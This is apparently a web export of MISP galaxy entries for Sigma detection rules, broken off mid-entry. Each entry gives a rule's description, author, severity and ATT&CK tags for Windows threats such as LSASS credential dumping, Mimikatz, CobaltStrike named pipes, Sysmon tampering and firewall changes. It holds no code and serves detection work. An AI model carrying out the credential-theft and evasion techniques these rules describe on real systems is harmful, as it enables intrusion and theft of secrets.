falsepositive ['Legitimate software such as AV and EDR']
filename proc_access_win_lsass_susp_access_flag.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Potential NT API Stub Patching

Detects potential NT API stub patching as seen used by the project PatchingAPI

Internal MISP references

UUID b916cba1-b38a-42da-9223-17114d846fd6 which can be used as unique global reference for Potential NT API Stub Patching in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/07
falsepositive ['Unknown']
filename proc_access_win_susp_invoke_patchingapi.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

LSASS Access From Potentially White-Listed Processes

Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference

Internal MISP references

UUID 4be8b654-0c01-4c9d-a10c-6b28467fc651 which can be used as unique global reference for LSASS Access From Potentially White-Listed Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/10
falsepositive ['Unknown']
filename proc_access_win_lsass_whitelisted_process_names.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']

Credential Dumping Activity By Python Based Tool

Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.

Internal MISP references

UUID f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9 which can be used as unique global reference for Credential Dumping Activity By Python Based Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, Jonhnathan Ribeiro
creation_date 2023/11/27
falsepositive ['Unknown']
filename proc_access_win_lsass_python_based_tool.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0349']

HackTool - HandleKatz Duplicating LSASS Handle

Detects HandleKatz opening LSASS to duplicate its handle, so that the memory can later be dumped without opening any new handles.

Internal MISP references

UUID b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5 which can be used as unique global reference for HackTool - HandleKatz Duplicating LSASS Handle in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj (rule), @thefLinkk
creation_date 2022/06/27
falsepositive ['Unknown']
filename proc_access_win_hktl_handlekatz_lsass_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1106', 'attack.defense_evasion', 'attack.t1003.001']

LSASS Memory Access by Tool With Dump Keyword In Name

Detects LSASS process access requests from a source process with the "dump" keyword in its image name.

Internal MISP references

UUID 9bd012ee-0dff-44d7-84a0-aa698cfd87a3 which can be used as unique global reference for LSASS Memory Access by Tool With Dump Keyword In Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/10
falsepositive ['Rare programs that contain the word dump in their name and access lsass']
filename proc_access_win_lsass_dump_keyword_image.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']

Function Call From Undocumented COM Interface EditionUpgradeManager

Detects function calls from the EditionUpgradeManager COM interface, an interface that is not used by standard executables.

Internal MISP references

UUID fb3722e4-1a06-46b6-b772-253e2e7db933 which can be used as unique global reference for Function Call From Undocumented COM Interface EditionUpgradeManager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_access_win_uac_bypass_editionupgrademanagerobj.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

HackTool - SysmonEnte Execution

Detects the use of SysmonEnte, a tool that attacks the integrity of Sysmon.

Internal MISP references

UUID d29ada0f-af45-4f27-8f32-f7b77c3dbc4e which can be used as unique global reference for HackTool - SysmonEnte Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Unknown']
filename proc_access_win_hktl_sysmonente.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']

Potential Process Hollowing Activity

Detects when a memory process image does not match the disk image, indicative of process hollowing.

Internal MISP references

UUID c4b890e5-8d8c-4496-8c66-c805753817cd which can be used as unique global reference for Potential Process Hollowing Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S
creation_date 2022/01/25
falsepositive ['Unknown']
filename proc_tampering_susp_process_hollowing.yml
level medium
logsource.category process_tampering
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.012']

Sysmon Blocked Executable

Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy.

Internal MISP references

UUID 23b71bc5-953e-4971-be4c-c896cda73fc2 which can be used as unique global reference for Sysmon Blocked Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/16
falsepositive ['Unlikely']
filename sysmon_file_block_executable.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Sysmon Configuration Change

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or of someone trying to manipulate the configuration.

Internal MISP references

UUID 8ac03a65-6c84-4116-acad-dc1558ff7a77 which can be used as unique global reference for Sysmon Configuration Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/12
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Sysmon Blocked File Shredding

Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.

Internal MISP references

UUID c3e5c1b1-45e9-4632-b242-27939c170239 which can be used as unique global reference for Sysmon Blocked File Shredding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/07/20
falsepositive ['Unlikely']
filename sysmon_file_block_shredding.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Sysmon Configuration Error

Detects, based on error messages, when an adversary is trying to hide its actions from Sysmon logging.

Internal MISP references

UUID 815cd91b-7dbc-4247-841a-d7dd1392b0a8 which can be used as unique global reference for Sysmon Configuration Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/04
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification_error.yml
level high
logsource.category sysmon_error
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']

Sysmon Configuration Modification

Detects when an attacker tries to hide from Sysmon by disabling or stopping it.

Internal MISP references

UUID 1f2b5353-573f-4880-8e33-7d04dcf97744 which can be used as unique global reference for Sysmon Configuration Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/04
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification_status.yml
level high
logsource.category sysmon_status
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']

Sysmon File Executable Creation Detected

Triggers on any Sysmon "FileExecutableDetected" event, which is raised every time a PE file covered by the configuration is created.

Internal MISP references

UUID 693a44e9-7f26-4cb6-b787-214867672d3a which can be used as unique global reference for Sysmon File Executable Creation Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/07/20
falsepositive ['Unlikely']
filename sysmon_file_executable_detected.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

CobaltStrike Named Pipe

Detects the creation of a named pipe as used by CobaltStrike.

Internal MISP references

UUID d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 which can be used as unique global reference for CobaltStrike Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021/05/25
falsepositive ['Unknown']
filename pipe_created_hktl_cobaltstrike.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

PUA - CSExec Default Named Pipe

Detects the creation of the default CSExec named pipe.

Internal MISP references

UUID f318b911-ea88-43f4-9281-0de23ede628e which can be used as unique global reference for PUA - CSExec Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Legitimate Administrator activity']
filename pipe_created_pua_csexec_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002']

HackTool - DiagTrackEoP Default Named Pipe

Detects the creation of the default named pipe used by the DiagTrackEoP POC, a tool that abuses the "SeImpersonate" privilege.

Internal MISP references

UUID 1f7025a6-e747-4130-aac4-961eb47015f1 which can be used as unique global reference for HackTool - DiagTrackEoP Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unlikely']
filename pipe_created_hktl_diagtrack_eop.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.privilege_escalation']

HackTool - EfsPotato Named Pipe Creation

Detects the pipe name pattern used by the hack tool EfsPotato.

Internal MISP references

UUID 637f689e-b4a5-4a86-be0e-0100a0a33ba2 which can be used as unique global reference for HackTool - EfsPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/23
falsepositive ['\pipe\LOCAL\Monitorian']
filename pipe_created_hktl_efspotato.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

New PowerShell Instance Created

Detects the execution of PowerShell via the creation of a named pipe whose name starts with PSHost.

Internal MISP references

UUID ac7102b4-9e1e-4802-9b4f-17c5524c015c which can be used as unique global reference for New PowerShell Instance Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/09/12
falsepositive ['Likely']
filename pipe_created_powershell_execution_pipe.yml
level informational
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Alternate PowerShell Hosts Pipe

Detects alternate PowerShell hosts, which can bypass detections that only look for powershell.exe.

Internal MISP references

UUID 58cb02d5-78ce-4692-b3e1-dce850aae41a which can be used as unique global reference for Alternate PowerShell Hosts Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019/09/12
falsepositive ['Programs using PowerShell directly without invocation of a dedicated interpreter.']
filename pipe_created_powershell_alternate_host_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

CobaltStrike Named Pipe Patterns

Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles.

Internal MISP references

UUID 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 which can be used as unique global reference for CobaltStrike Named Pipe Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
creation_date 2021/07/30
falsepositive ['Chrome instances using the exact same pipe name "mojo.xxx"', 'Websense Endpoint using the pipe name "DserNamePipe(R
filename pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055', 'stp.1k']

PUA - PAExec Default Named Pipe

Detects the creation of the PAExec default named pipe.

Internal MISP references

UUID f6451de4-df0a-41fa-8d72-b39f54a08db5 which can be used as unique global reference for PUA - PAExec Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Unknown']
filename pipe_created_pua_paexec_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']

HackTool - Credential Dumping Tools Named Pipe Created

Detects the execution of well-known credential dumping tools via the creation of their specific named pipes.

Internal MISP references

UUID 961d0ba2-3eea-4303-a930-2cf78bbfcc5e which can be used as unique global reference for HackTool - Credential Dumping Tools Named Pipe Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/11/01
falsepositive ['Legitimate Administrator using tool for password recovery']
filename pipe_created_hktl_generic_cred_dump_tools_pipes.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005']

HackTool - Koh Default Named Pipe

Detects the creation of the default named pipes used by the Koh tool.

Internal MISP references

UUID 0adc67e0-a68f-4ffd-9c43-28905aad5d6a which can be used as unique global reference for HackTool - Koh Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/08
falsepositive ['Unlikely']
filename pipe_created_hktl_koh_default_pipe.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access', 'attack.t1528', 'attack.t1134.001']

ADFS Database Named Pipe Connection By Uncommon Tool

Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Such connections are used to access information such as the AD FS configuration settings, which contain sensitive material used to sign SAML tokens.

Internal MISP references

UUID 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 which can be used as unique global reference for ADFS Database Named Pipe Connection By Uncommon Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2021/10/08
falsepositive ['Unknown']
filename pipe_created_adfs_namedpipe_connection_uncommon_tool.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.collection', 'attack.t1005']

WMI Event Consumer Created Named Pipe

Detects the WMI Event Consumer service scrcons.exe creating a named pipe.

Internal MISP references

UUID 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb which can be used as unique global reference for WMI Event Consumer Created Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/09/01
falsepositive ['Unknown']
filename pipe_created_scrcons_wmi_consumer_namedpipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.t1047', 'attack.execution']

CobaltStrike Named Pipe Pattern Regex

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles.

Internal MISP references

UUID 0e7163d4-9e19-4fa7-9be6-000c61aad77a which can be used as unique global reference for CobaltStrike Named Pipe Pattern Regex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/30
falsepositive ['Unknown']
filename pipe_created_hktl_cobaltstrike_re.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

HackTool - CoercedPotato Named Pipe Creation

Detects the pipe name pattern used by the hack tool CoercedPotato.

Internal MISP references

UUID 4d0083b3-580b-40da-9bba-626c19fe4033 which can be used as unique global reference for HackTool - CoercedPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/10/11
falsepositive ['Unknown']
filename pipe_created_hktl_coercedpotato.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

Malicious Named Pipe Created

Detects the creation of a named pipe known to be used by APT groups or malware.

Internal MISP references

UUID fe3ac066-98bb-432a-b1e7-a5229cb39d4a which can be used as unique global reference for Malicious Named Pipe Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), blueteam0ps, elhoim
creation_date 2017/11/06
falsepositive ['Unknown']
filename pipe_created_susp_malicious_namedpipes.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']

PUA - RemCom Default Named Pipe

Detects the creation of the default RemCom named pipe.

Internal MISP references

UUID d36f87ea-c403-44d2-aa79-1a0ac7c24456 which can be used as unique global reference for PUA - RemCom Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Legitimate Administrator activity']
filename pipe_created_pua_remcom_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002']

PsExec Tool Execution From Suspicious Locations - PipeName

Detects PsExec default pipe creation where the executed image is located in a suspicious location, which could indicate that the tool is being used in an attack.

Internal MISP references

UUID 41504465-5e3a-4a5b-a5b4-2a0baadd4463 which can be used as unique global reference for PsExec Tool Execution From Suspicious Locations - PipeName in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/04
falsepositive ['Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment.']
filename pipe_created_sysinternals_psexec_default_pipe_susp_location.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']

Mimikatz Use

This method detects Mimikatz keywords in different event logs (some of them only appear in older Mimikatz versions that are, however, still used by various threat groups).

Internal MISP references

UUID 06d71506-7beb-4f22-8888-e2e5e2ca7fd8 which can be used as unique global reference for Mimikatz Use in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE (additional keywords)
creation_date 2017/01/10
falsepositive ['Naughty administrators', 'AV Signature updates', 'Files with Mimikatz in their filename']
filename win_alert_mimikatz_keywords.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.s0002', 'attack.lateral_movement', 'attack.credential_access', 'car.2013-07-001', 'car.2019-04-004', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.001', 'attack.t1003.006']

New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.

Internal MISP references

UUID 9e2575e7-2cb9-4da1-adc8-ed94221dca5e which can be used as unique global reference for New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/02/26
falsepositive ['Unknown']
filename win_firewall_as_add_rule_susp_folder.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

The Windows Defender Firewall Service Failed To Load Group Policy

Detects when the Windows Defender Firewall service failed to load Group Policy.

Internal MISP references

UUID 7ec15688-fd24-4177-ba43-1a950537ee39 which can be used as unique global reference for The Windows Defender Firewall Service Failed To Load Group Policy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_failed_load_gpo.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

A Rule Has Been Deleted From The Windows Firewall Exception List

Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall.

Internal MISP references

UUID c187c075-bb3e-4c62-b4fa-beae0ffc211f which can be used as unique global reference for A Rule Has Been Deleted From The Windows Firewall Exception List in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_delete_rule.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

Windows Defender Firewall Has Been Reset To Its Default Configuration

Detects when the Windows Defender Firewall has been reset to its default configuration.

Internal MISP references

UUID 04b60639-39c0-412a-9fbe-e82499c881a3 which can be used as unique global reference for Windows Defender Firewall Has Been Reset To Its Default Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_reset_config.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

All Rules Have Been Deleted From The Windows Firewall Configuration

Detects when all the rules have been deleted from the Windows Defender Firewall configuration.

Internal MISP references

UUID 79609c82-a488-426e-abcf-9f341a39365d which can be used as unique global reference for All Rules Have Been Deleted From The Windows Firewall Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/17
falsepositive No established falsepositives
filename win_firewall_as_delete_all_rules.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

Windows Firewall Settings Have Been Changed

Detects when the settings of the Windows Firewall have been changed.

Internal MISP references

UUID 00bb5bd5-1379-4fcf-a965-a5b6f7478064 which can be used as unique global reference for Windows Firewall Settings Have Been Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_setting_change.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

Uncommon New Firewall Rule Added In Windows Firewall Exception List

Detects when a rule has been added to the Windows Firewall exception list.

Internal MISP references

UUID cde0a575-7d3d-4a49-9817-b8004a7bf105 which can be used as unique global reference for Uncommon New Firewall Rule Added In Windows Firewall Exception List in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_add_rule.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

Local User Creation

Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.

Internal MISP references

UUID 66b6be3d-55d0-4f47-9855-d69df21740ea which can be used as unique global reference for Local User Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patrick Bareiss
creation_date 2019/04/18
falsepositive ['Domain Controller Logs', 'Local accounts managed by privileged account management tools']
filename win_security_user_creation.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']

Invoke-Obfuscation COMPRESS OBFUSCATION - Security

Detects obfuscated PowerShell via COMPRESS OBFUSCATION.

Internal MISP references

UUID 7a922f1b-2635-4d6c-91ef-af228b198ad3 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_compress_services_security.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'

The 'LsaRegisterLogonProcess' function verifies that the application making the call is a logon process by checking that it holds the SeTcbPrivilege privilege. A failed call may indicate Rubeus trying to obtain a handle to LSA.

Internal MISP references

UUID 6daac7fc-77d1-449a-a71a-e6b4d59a0e54 which can be used as unique global reference for User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1558.003']

Addition of SID History to Active Directory Object

An attacker can use the SID history attribute to gain additional privileges.

Internal MISP references

UUID 2632954e-db1c-49cb-9936-67d1ef1d17d2 which can be used as unique global reference for Addition of SID History to Active Directory Object in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, @atc_project (improvements)
creation_date 2017/02/19
falsepositive ['Migration of an account into a new domain']
filename win_security_susp_add_sid_history.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1134.005']
Related clusters

To see the related clusters, click here.

ISO Image Mounted

Detects the mount of an ISO image on an endpoint

Internal MISP references

UUID 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073 which can be used as unique global reference for ISO Image Mounted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Syed Hasan (@syedhasan009)
creation_date 2021/05/29
falsepositive ['Software installation ISO files']
filename win_security_iso_mount.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Important Scheduled Task Deleted/Disabled

Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 7595ba94-cf3b-4471-aa03-4f6baa9e5fad which can be used as unique global reference for Important Scheduled Task Deleted/Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_security_susp_scheduled_task_delete_or_disable.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Remote Access Tool Services Have Been Installed - Security

Detects service installation of different remote access tool software. Such software is often abused by threat actors to perform

Internal MISP references

UUID c8b00925-926c-47e3-beea-298fd563728e which can be used as unique global reference for Remote Access Tool Services Have Been Installed - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Connor Martin, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ["The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out"]
filename win_security_service_install_remote_access_software.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA - Security

Detects obfuscated PowerShell via use of MSHTA in scripts

Internal MISP references

UUID 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_use_mshta_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious AccessMask Requested From LSASS

Detects a process handle being opened on the LSASS process with certain access masks

Internal MISP references

UUID 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76 which can be used as unique global reference for Potentially Suspicious AccessMask Requested From LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
creation_date 2019/11/01
falsepositive ['Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it']
filename win_security_susp_lsass_dump_generic.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'car.2019-04-004', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Failed Code Integrity Checks

Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.

Internal MISP references

UUID 470ec5fa-7b4e-4071-b200-4c753100f49b which can be used as unique global reference for Failed Code Integrity Checks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/12/03
falsepositive ['Disk device errors']
filename win_security_codeintegrity_check_failure.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.001']
Related clusters

To see the related clusters, click here.

Password Policy Enumerated

Detects when the password policy is enumerated.

Internal MISP references

UUID 12ba6a38-adb3-4d6b-91ba-a7fb248e3199 which can be used as unique global reference for Password Policy Enumerated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/19
falsepositive No established falsepositives
filename win_security_password_policy_enumerated.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1201']
Related clusters

To see the related clusters, click here.

Device Installation Blocked

Detects an installation of a device that is forbidden by the system policy

Internal MISP references

UUID c9eb55c3-b468-40ab-9089-db2862e42137 which can be used as unique global reference for Device Installation Blocked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_device_installation_blocked.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.t1200']
Related clusters

To see the related clusters, click here.

Suspicious PsExec Execution

Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes, or if an attacker uses a PsExec client other than the Sysinternals one.

Internal MISP references

